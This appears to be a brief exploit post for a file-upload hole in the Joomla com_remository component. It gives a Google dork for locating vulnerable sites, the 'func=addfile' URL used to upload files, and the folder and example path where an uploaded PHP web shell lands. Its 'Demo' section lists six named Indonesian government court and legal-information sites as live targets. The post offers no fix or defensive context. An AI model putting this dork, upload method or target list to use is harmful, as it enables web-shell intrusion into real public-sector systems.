Vendor Homepage : http://remository.com/
" com_remository "
Category: [ Webapps ]
Google Dork : inurl:/index.php?option=com_remository
Exploit : index.php?option=com_remository&Itemid=[Itemid]&func=addfile
shell folder : /components/com_remository_files/file_image_1/
=========================
http://site.com/components/com_remository_files/file_image_1/6216shell.php
DIR : /home/user/htdocs/file/
Demo :
https://jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=46&func=addfile
http://jdih.pa-tangerangkota.go.id/index.php?option=com_remository&Itemid=46&func=addfile
http://jdih.pn-meulaboh.go.id/index.php?option=com_remository&Itemid=46&func=addfile
http://jdih.dilmil-surabaya.go.id/index.php?option=com_remository&Itemid=46&func=addfile
http://jdih.pn-baturaja.go.id/index.php?option=com_remository&Itemid=46&func=addfile
http://pa-serang.go.id/jdih/index.php?option=com_remository&Itemid=46&func=addfile
thanks to : Ternate Lab Pantesting
0 Komentar